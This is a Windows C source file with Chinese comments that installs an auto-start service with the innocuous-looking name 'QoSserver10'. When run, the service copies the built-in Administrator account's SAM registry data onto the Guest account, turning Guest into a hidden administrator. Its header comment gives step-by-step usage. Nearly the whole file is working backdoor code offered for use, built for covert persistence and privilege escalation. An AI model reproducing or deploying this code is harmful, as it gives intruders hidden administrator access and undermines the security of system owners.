//------------------------------------------------------------------------- //用法: //先在命令行下输入"Ex-Service install",安装服务. //再在服务管理器里启动名为QoSserver的服务,一旦启动会将Guest帐号克隆为administrator //------------------------------------------------------------------------- #include #include void WINAPI KServiceMain(DWORD argc, LPTSTR * argv); void InstallService(const char * szServiceName); int Clone(char *user); int main(int argc, char * argv[]) { if ((argc==2) && (::strcmp(argv[1], "install")==0)) { InstallService("QoSserver10"); return 0; } SERVICE_TABLE_ENTRY service_table_entry[] ={ { "QoSserver10",//后台服务线程的名称 KServiceMain },//后台服务线程入口点 { NULL, NULL }//标志表的结束 };//定义了两个SERVICE_TABLE_ENTRY结构数组 StartServiceCtrlDispatcher(service_table_entry);//指明一个服务的主线程 return 0; } SERVICE_STATUS servicestatus; SERVICE_STATUS_HANDLE servicestatushandle; void InstallService(const char * szServiceName) { SC_HANDLE hService=0,handle=0; handle = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS); if (handle!=NULL) { char szFilename[256]; GetModuleFileName(NULL, szFilename, 255); hService = CreateService( handle, szServiceName, szServiceName, SERVICE_ALL_ACCESS, SERVICE_WIN32_OWN_PROCESS, SERVICE_AUTO_START, SERVICE_ERROR_IGNORE, szFilename, NULL, NULL, NULL, NULL, NULL ); } CloseServiceHandle(hService); CloseServiceHandle(handle); } void WINAPI ServiceCtrlHandler(DWORD dwControl) { switch (dwControl) { case SERVICE_CONTROL_PAUSE: servicestatus.dwCurrentState = SERVICE_PAUSE_PENDING; SetServiceStatus(servicestatushandle, &servicestatus); servicestatus.dwCurrentState = SERVICE_PAUSED; break; case SERVICE_CONTROL_CONTINUE: servicestatus.dwCurrentState = SERVICE_CONTINUE_PENDING; SetServiceStatus(servicestatushandle, &servicestatus); servicestatus.dwCurrentState = SERVICE_RUNNING; break; case SERVICE_CONTROL_STOP: servicestatus.dwCurrentState = SERVICE_STOP_PENDING; SetServiceStatus(servicestatushandle, &servicestatus); servicestatus.dwCurrentState = SERVICE_STOPPED; break; case SERVICE_CONTROL_SHUTDOWN: break; case SERVICE_CONTROL_INTERROGATE: servicestatus.dwCurrentState = SERVICE_RUNNING; break; } SetServiceStatus(servicestatushandle, &servicestatus); } void WINAPI KServiceMain(DWORD argc, LPTSTR * argv) { //注册服务控制处理函数 bool bInitialized = true; servicestatushandle =::RegisterServiceCtrlHandler("QoSserver10", ServiceCtrlHandler); if (servicestatushandle == (SERVICE_STATUS_HANDLE)0) return; servicestatus.dwServiceType = SERVICE_WIN32_OWN_PROCESS; servicestatus.dwCurrentState = SERVICE_START_PENDING; servicestatus.dwControlsAccepted = SERVICE_ACCEPT_STOP;//表明Service目前能接受的命令是SERVICE_CONTROL_STOP 标志 servicestatus.dwWin32ExitCode = 0; servicestatus.dwServiceSpecificExitCode = 0; servicestatus.dwCheckPoint = 0; servicestatus.dwWaitHint = 0; SetServiceStatus(servicestatushandle, &servicestatus);//必须随时更新数据库中Service的状态。 servicestatus.dwCheckPoint = 0; servicestatus.dwWaitHint = 0; Clone("406"); if (!bInitialized) { servicestatus.dwCurrentState = SERVICE_STOPPED; servicestatus.dwWin32ExitCode = ERROR_SERVICE_SPECIFIC_ERROR; servicestatus.dwServiceSpecificExitCode = 1; } else { servicestatus.dwCurrentState = SERVICE_RUNNING; } SetServiceStatus(servicestatushandle, &servicestatus); return; } int Clone(char *user) { HKEY hkeyRoot,hkeyUser; char CloneUserKey[100]; DWORD Type=REG_BINARY,sizeF=1024*2,sizeV=1024*10,ret; LPBYTE lpDataF,lpDataV; lpDataF = (LPBYTE) malloc(1024*2); lpDataV = (LPBYTE) malloc(1024*10); ZeroMemory(lpDataF,1024*2); ZeroMemory(lpDataV,1024*10); ZeroMemory(CloneUserKey,100); strcpy(CloneUserKey,"SAM\\SAM\\Domains\\Account\\Users\\00000"); strcat(CloneUserKey,user); ret= RegOpenKeyEx( HKEY_LOCAL_MACHINE, "SAM\\SAM\\Domains\\Account\\Users\\000001F4", 0, KEY_ALL_ACCESS, &hkeyRoot); if(ret==ERROR_SUCCESS) ; else { printf("open key FAIL\n\r"); return 0; } ret = RegQueryValueEx( hkeyRoot, "F", NULL, &Type, lpDataF, &sizeF ); if(ret==ERROR_SUCCESS) ; else { printf("Query key FAIL\n\r"); return 0; } ret = RegQueryValueEx( hkeyRoot, "V", NULL, &Type, lpDataV, &sizeV ); if(ret==ERROR_SUCCESS) ; else { printf("Query key FAIL\n\r"); return 0; } ret = RegOpenKeyEx( HKEY_LOCAL_MACHINE, CloneUserKey, 0, KEY_ALL_ACCESS, &hkeyUser); if(ret==ERROR_SUCCESS) ; else { printf("open key FAIL\n\r"); return 0; } ret= RegSetValueEx( hkeyUser, "F", 0, REG_BINARY, lpDataF, sizeF); if(ret==ERROR_SUCCESS) ; else { printf("set key FAIL\n\r"); return 0; } ret= RegSetValueEx( hkeyUser, "V", 0, REG_BINARY, lpDataV, sizeV); if(ret==ERROR_SUCCESS) ; else { printf("set key FAIL\n\r"); return 0; } if(ret==ERROR_SUCCESS) printf("clone SUCCESS\n\r"); else { printf("clone FAIL\n\r"); return 0; } RegCloseKey(hkeyRoot); RegCloseKey(hkeyUser); return 1; }